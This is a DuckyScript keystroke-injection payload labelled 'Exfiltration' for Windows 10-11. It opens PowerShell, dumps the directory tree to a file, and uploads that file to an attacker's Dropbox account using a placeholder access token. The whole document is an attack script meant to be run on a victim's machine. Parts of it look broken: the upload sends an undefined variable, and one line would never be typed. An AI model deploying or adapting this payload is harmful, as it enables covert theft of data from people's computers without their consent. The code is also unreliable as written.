
REM ###########################################################
REM #                                                         |
REM # Title        : Tree Structure Of The Operating System   |
REM # Author       : Aleff                                    |
REM # Version      : 1.0                                      |
REM # Category     : Exfiltration                             |
REM # Target       : Windows 10-11                            |
REM #                                                         |
REM ###########################################################


REM Requirements:
REM     - Internet connection


GUI r
DELAY 1000
STRING PowerShell
ENTER
DELAY 1000

STRINGLN  tree /f /a > out.txt

REM It depends byt the content and by the path choosen
DELAY 5000

$filePath = ".\out.txt"

REM Setting about exfiltration
STRING $accessToken = 
STRING DROPBOX_ACCESS_TOKEN
ENTER

STRINGLN
    $authHeader = @{Authorization = "Bearer $accessToken"}
    $dropboxFilePath = "/out_exported.txt"

    $uploadUrl = "https://content.dropboxapi.com/2/files/upload"

    $headers = @{}
    $headers.Add("Authorization", "Bearer $accessToken")
    $headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
    $headers.Add("Content-Type", "application/octet-stream")

    Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $fileContent; exit;
END_STRINGLN